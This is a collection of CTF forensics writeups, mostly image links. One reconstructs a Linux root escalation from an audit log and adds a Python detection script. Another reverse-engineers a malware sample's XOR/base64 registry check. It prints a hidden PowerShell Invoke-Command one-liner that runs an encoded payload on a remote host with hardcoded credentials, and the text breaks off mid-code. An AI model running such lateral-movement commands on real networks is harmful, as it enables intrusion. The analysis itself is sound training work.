-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 13.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 14.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 15.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 16.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 17.png 
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 18.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 19.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 20.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 21.png 
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 22.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 23.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 24.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 25.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 26.png 
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 27.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 28.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 29.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 30.png 
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 31.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 32.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 33.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 5.png 
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image 9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/image.png 
-------------------------------------------------------------------------------- /Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C6 - Exorcising Sukuna’s Curse/images/imagee.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/README.md: --------------------------------------------------------------------------------
**C7 - Root Reaper Quest**

*Shinigami-like powers have been used to elevate privileges, leaving traces in the logs with cryptic references to Bleach. Your goal: identify the binary and PID responsible for gaining root. Will you find the key hidden in the shadows? (Write only PID)*

![image.png](images/image1.png)
-------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who
Am I/Writeups/C7 - Root Reaper Quest/images/image3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.jpg -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C7 - Root Reaper Quest/images/image6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C7 - Root Reaper Quest/writeup.md: --------------------------------------------------------------------------------
# C7 - Root Reaper Quest

In this challenge, we are given a Linux audit log and tasked with a threat-hunting exercise: reconstruct the attack and name the binary and PID that gained root. The file is plain text, so Notepad or Visual Studio Code will open it, but the reports below come from `aureport`, which ships with the auditd package. Install it with:

`sudo apt install auditd`

`aureport` (and `ausearch`) read the live audit trail by default; point them at the challenge file with `-if <file>` (`--input`). A good starting point is the summary report, which gives an overall picture of what the log contains (the examples below assume the file is called `audit.log`):

`aureport -if audit.log --summary`

![image.png](images/image2.png)

From the output, we can see that the account "bankai" was compromised. Our goal is to identify the type of attack used to gain initial access. Looking at the individual authentication events (the `-au` report lists each attempt with its timestamp), we notice that within a span of 1 second there were almost 16 authentication attempts against that account. This is a clear indication of a password brute-force rather than a user mistyping a password. The attacker got lucky: a successful attempt appears at the end of the burst.
Seventeen seconds later, they used the compromised username and password to log in over SSH and were allocated a pseudo-terminal.

![image.png](images/image3.png)

Next, we need to analyze the attacker's actions after gaining access. The first thing that likely comes to mind is system enumeration. Because auditd records TTY keystrokes, we can use the `--tty` report to replay what was typed in that session:

`aureport -if audit.log --tty`

As shown in the screenshot below, the attacker ran several commands:
- `hostname` to display the system's hostname
- `whoami` to display the current user, and `ls` to list the contents of the current directory
- `wget` to download the LinPEAS script from their own machine, which served it on port 8000
(*LinPEAS is a script that searches for possible privilege-escalation paths on Linux hosts*)

![image.png](images/image4.png)

Now we need to determine the name of the binary that the attacker used to gain root access. This will give us the crucial piece of information required to finish this challenge: the PID responsible for it.
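As an added example (my code, not part of this writeup), the script below does over raw `audit.log` records what the `aureport` reports in this writeup are used for: it flags a burst of failed sshd authentications that ends in a success, reassembles the keystrokes of a session from the hex-encoded TTY records, and joins each EXECVE record to its SYSCALL record through the shared event serial to get the PID, path and effective uid of a given binary. The log lines are constructed: timestamps, PIDs, session number and the address 10.0.0.66 are invented, and the account, binary name and path only mirror this challenge.

```python
import re
from collections import defaultdict

# Raw audit.log syntax: "type=T msg=audit(SECS.MS:SERIAL): key=value ..."
HEADER_RE = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): ?(.*)$")
FIELD_RE = re.compile(r"(\w+)=(\"[^\"]*\"|'[^']*'|\S+)")


def parse_records(text):
    """Parse audit.log lines into dicts; fields nested in msg='...' (PAM records) are flattened."""
    records = []
    for line in text.splitlines():
        m = HEADER_RE.match(line.strip())
        if not m:
            continue
        rtype, ts, serial, rest = m.groups()
        fields = {}
        for key, val in FIELD_RE.findall(rest):
            if key == "msg" and val.startswith("'"):
                for k2, v2 in FIELD_RE.findall(val.strip("'")):
                    fields[k2] = v2.strip('"')
            else:
                fields[key] = val.strip('"')
        records.append({"type": rtype, "ts": float(ts), "serial": int(serial), **fields})
    return records


def find_auth_bursts(records, window=1.0, threshold=10):
    """Accounts with >= threshold failed PAM authentications inside `window` seconds
    (the brute-force signature) and the first successful authentication that followed."""
    failed, succeeded = defaultdict(list), defaultdict(list)
    for r in records:
        if r["type"] == "USER_AUTH":
            bucket = failed if r.get("res") == "failed" else succeeded
            bucket[r.get("acct", "?")].append(r["ts"])
    bursts = []
    for acct, times in failed.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):            # sliding window over failure times
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            later = [t for t in succeeded.get(acct, []) if t >= times[0]]
            bursts.append({"acct": acct, "failed_in_window": best,
                           "success_ts": min(later) if later else None})
    return bursts


def tty_keystrokes(records, ses):
    """Replay what was typed in one audit session: TTY records carry the keystrokes hex-encoded in data=."""
    return "".join(bytes.fromhex(r["data"]).decode("utf-8", "replace")
                   for r in records if r["type"] == "TTY" and r.get("ses") == str(ses))


def find_exec_pids(records, argv0):
    """Join EXECVE records (argv) to their SYSCALL record (pid, exe, euid) through the
    shared event serial and return every execution whose argv[0] equals `argv0`."""
    syscalls = {r["serial"]: r for r in records if r["type"] == "SYSCALL"}
    hits = []
    for r in records:
        if r["type"] == "EXECVE" and r.get("a0") == argv0:
            sc = syscalls.get(r["serial"], {})
            hits.append({"pid": int(sc.get("pid", -1)), "exe": sc.get("exe"),
                         "euid": sc.get("euid"), "ts": r["ts"]})
    return hits


def _pam_auth(ts, serial, res):
    """One constructed sshd PAM record (timestamps, PIDs and 10.0.0.66 are invented)."""
    return (f"type=USER_AUTH msg=audit({ts:.3f}:{serial}): pid=4101 uid=0 auid=4294967295 ses=4294967295 "
            f"msg='op=PAM:authentication grantors=? acct=\"bankai\" exe=\"/usr/sbin/sshd\" "
            f"hostname=10.0.0.66 addr=10.0.0.66 terminal=ssh res={res}'")


# Constructed log modelled on the attack in this writeup: 15 failures in 0.7 s, one success,
# an SSH login 17 s later, keystrokes, then ./evil and a whoami that already runs as uid 0.
SAMPLE_LOG = "\n".join(
    [_pam_auth(1727281500.100 + i * 0.05, 2000 + i, "failed") for i in range(15)]
    + [_pam_auth(1727281500.900, 2015, "success"),
       "type=USER_LOGIN msg=audit(1727281517.900:2030): pid=4120 uid=0 auid=1001 ses=7 "
       "msg='op=login id=1001 exe=\"/usr/sbin/sshd\" addr=10.0.0.66 terminal=/dev/pts/0 res=success'",
       "type=TTY msg=audit(1727281520.000:2040): tty pid=4130 uid=1001 auid=1001 ses=7 comm=\"bash\" data=686F73746E616D650A",
       "type=TTY msg=audit(1727281521.000:2041): tty pid=4130 uid=1001 auid=1001 ses=7 comm=\"bash\" data=77686F616D690A",
       "type=TTY msg=audit(1727281637.400:2099): tty pid=4130 uid=1001 auid=1001 ses=7 comm=\"bash\" data=2E2F6576696C0A",
       "type=SYSCALL msg=audit(1727281637.412:2100): arch=c000003e syscall=59 success=yes exit=0 ppid=4130 "
       "pid=829992 auid=1001 uid=1001 euid=1001 tty=pts0 ses=7 comm=\"evil\" exe=\"/home/sosuke_aizen/evil/evil\" key=\"exec\"",
       "type=EXECVE msg=audit(1727281637.412:2100): argc=1 a0=\"./evil\"",
       "type=CWD msg=audit(1727281637.412:2100): cwd=\"/home/sosuke_aizen/evil\"",
       "type=SYSCALL msg=audit(1727281640.001:2110): arch=c000003e syscall=59 success=yes exit=0 ppid=829992 "
       "pid=829995 auid=1001 uid=0 euid=0 tty=pts0 ses=7 comm=\"whoami\" exe=\"/usr/bin/whoami\" key=\"exec\"",
       "type=EXECVE msg=audit(1727281640.001:2110): argc=1 a0=\"whoami\""])


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    for b in find_auth_bursts(recs):
        print(f"{b['acct']}: {b['failed_in_window']} failed logins within 1 s, success at {b['success_ts']}")
    print("typed in session 7:", tty_keystrokes(recs, 7).splitlines())
    for h in find_exec_pids(recs, "./evil"):
        print(f"./evil ran as pid {h['pid']} ({h['exe']}), euid {h['euid']}, at {h['ts']}")
```

Against a real capture, read the file and pass its contents to `parse_records`; `window` and `threshold` are the knobs to tune for the brute-force check, and the `euid` field returned by `find_exec_pids` is what distinguishes the attacker's own `whoami` (uid 1001) from the one run from the root shell.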

Following the output from the previous command, we saw that the attacker executed `lsb_release -a`, which prints the distribution name and version, and then `sudo -V`, which prints the sudo version (and, when run as root, the build configuration and plugin details). Fingerprinting the distribution and the exact sudo version right after running LinPEAS is a strong hint that the attacker was checking whether the installed sudo was affected by a known privilege-escalation bug.

Five seconds after determining the sudo version, the attacker downloaded a compressed archive to the target machine, again from their own server. They ran `ls` to confirm the download, extracted the archive, changed into the extracted directory, and ran `make` to build it.

Since `make` succeeded, the archive must have contained source code with a Makefile, i.e. an exploit that had to be compiled on the target. Once the build completed, the attacker executed a binary called `evil`.

To find its PID, we can use the `-p` (process) report, and since we are only interested in that binary, filter the output with `grep`:

`aureport -if audit.log -p | grep evil`

The result we get is:

![image.png](images/image5.png)

We can see that the PID of the binary is *829992*, running from the */home/sosuke_aizen/evil/evil* path at 20:27:17. Additionally, we can observe that the attacker executed the file using `./evil` and then verified that they had gained root access by running `whoami`. To confirm the escalation from the log itself rather than from the attacker's own check, `ausearch -if audit.log -p 829992` prints the raw records of that process and `ausearch -if audit.log -pp 829992` those of its children; the `uid`/`euid` fields of the SYSCALL record for the shell that ran `whoami` show whether it was root.

![image.png](images/image6.png)

It seems even the mighty Sōsuke Aizen, the genius who once transcended the boundaries of Shinigami and Hollow, was outwitted in the cyber realm. How the tables have turned! Is this mysterious hacker the next Ichigo Kurosaki?
In this digital battle, the lines between the real world and the spiritual realm blur, leaving us to wonder: has Aizen found his true match in this realm?

Only the Soul King knows.

![image.png](images/image6.jpg)
-------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 1.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 10.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 11.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 2.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png:
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 3.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 4.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 5.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 6.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 7.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 8.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image 9.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/image.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/icsd-ctf/ICSD/51a3c4c16d5d987550400677397128f1bf284ca4/Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Images/imageee.png -------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/README.md: --------------------------------------------------------------------------------
# In Quest for Rogue Dragon

*A rogue dragon has invaded Isle of Berk. As a Dragon Rider, you must uncover the hidden registry key—the secret to taming this beast. Follow the trail like Hiccup and Toothless chasing the Bewilderbeast, uncovering the attacker’s lair. Can you tame this dragon before it burns everything down? The fate of Berk rests in your hands, help Hiccup in this adventure!*

![image.png](Images/imageee.png)

1. Crack the executable and observe what value the crawler-point registry key is equal to (the registry key path is HKLM\SOFTWARE\crawler-ctf\configuration, which can be obtained from the executable).

2. This is the pastebin endpoint. Follow the redirection and observe which C2 server this executable is connecting to.
-------------------------------------------------------------------------------- /Who Am I/Writeups/C8 - In Quest for Rogue Dragon/Writeup.md: --------------------------------------------------------------------------------
# In Quest For Rogue Dragon

When loading **rev.exe** into the IDA debugger and viewing its pseudocode, we observe that the executable reads a value from the registry and compares a transformed copy of it against a constant. This is a typical environment check: the malware validates system-specific data to make sure it is running on the intended machine, and behaves differently otherwise.

![image.png](Images/image.png)

To investigate further, we can set a breakpoint on the registry query call and inspect which key and value name are being accessed (the challenge text places the key at `HKLM\SOFTWARE\crawler-ctf\configuration`). By doing this, we can uncover the specific data the malware uses to tailor its behaviour to the victim's system.

![image.png](Images/image%201.png)

![image.png](Images/image%202.png)

Upon closer inspection, it becomes evident that the variable `a3` is a single-byte XOR key applied to every byte of the registry value; recovering it is the critical step for decoding the data the malware compares against.

![image.png](Images/image%203.png)

![image.png](Images/image%204.png)

![image.png](Images/image%205.png)

Continuing the analysis at the call site, we see that the value in the ECX register, and therefore the XOR key, is **0x12**.
The malware then base64-encodes the XORed bytes and compares the result with the hardcoded string `PWthVSBaISZ7`; the check passes only if the two are equal.
To recover the registry value the malware expects, we invert the transform: base64-decode `PWthVSBaISZ7`, then XOR every byte with **0x12**.

![image.png](Images/image%206.png)

The decoded value reveals the answer to the first question: `/ysG2H34i`.

This string is a Pastebin path, which the malware uses to retrieve its next stage. By following the link, we can gather further details about the attack and potentially uncover the final objective of the malware.

![image.png](Images/image%207.png)

Upon visiting the endpoint, we find that it redirects to a PowerShell script named **icsd.ps1** (a copy is kept at the URL below), which contains the code used to push the attack further into the compromised environment.

```
https://github.com/HuseynAghazada/for-ctf/blob/main/icsd.ps1
```

The PowerShell script runs the following command. A password is passed as a plain string, wrapped into a `PSCredential` for the domain account `ICSD\bertholdt.hover`, and used to run a second, base64-encoded PowerShell payload on every host in `$iplist`:

```
powershell.exe -nop -w hidden -c $pass=ConvertTo-SecureString -string 'REDACTED' -asPlainText -force;$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist 'ICSD\bertholdt.hover',$pass;$ResultList=@();$iplist='10.100.11.250';foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start powershell.exe -nop -w hidden -noni -e --REDACTED-- } -Credential $creds;Sleep 20;
```

This is lateral movement with hardcoded credentials: each IP in `$iplist` is resolved to a hostname, and `Invoke-Command -ComputerName ... -Credential $creds` runs the hidden, encoded payload on those hosts through PowerShell remoting, which is how the script establishes its reverse shell and lets the attacker control the machines remotely. The `-nop -w hidden -noni` switches suppress the profile, the window and any interaction, so nothing visible appears on the victim's desktop, making it harder for the victim to realise they have been compromised.
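As an added example (my code, not the writeup's or the challenge's), the Python below re-implements the registry check analysed above in both directions (XOR with 0x12, base64, compare with `PWthVSBaISZ7`, and the inverse that recovers `/ysG2H34i`), lists the single-byte keys that would have been worth trying had ECX not been observed, and unwraps the two PowerShell wrappers this sample relies on: the UTF-16LE base64 that `-e` expects, and a `FromBase64String("...")` blob that gunzips to the next stage, which the writeup goes on to describe. The stage-1 script and the placeholder shellcode bytes are constructed here; only the magic string and the key come from the analysis.

```python
import base64
import gzip
import re
import string

MAGIC_B64 = "PWthVSBaISZ7"   # hardcoded comparison string recovered from rev.exe
XOR_KEY = 0x12               # key observed in ECX while debugging


def malware_check(registry_value: str, key: int = XOR_KEY) -> str:
    """The transform the binary applies to the registry value before comparing it
    with MAGIC_B64: XOR every byte with the key, then base64-encode."""
    xored = bytes(b ^ key for b in registry_value.encode())
    return base64.b64encode(xored).decode()


def recover_expected_value(magic_b64: str = MAGIC_B64, key: int = XOR_KEY) -> str:
    """Invert malware_check: base64-decode, then XOR with the same key."""
    return bytes(b ^ key for b in base64.b64decode(magic_b64)).decode()


def candidate_keys(magic_b64: str = MAGIC_B64) -> list:
    """If ECX had not been observed: every single-byte key under which all decoded
    bytes are printable ASCII. Short enough to try by hand against the paste site."""
    raw = base64.b64decode(magic_b64)
    printable = set(string.printable) - set("\t\n\r\x0b\x0c")
    return [k for k in range(256) if all(chr(b ^ k) in printable for b in raw)]


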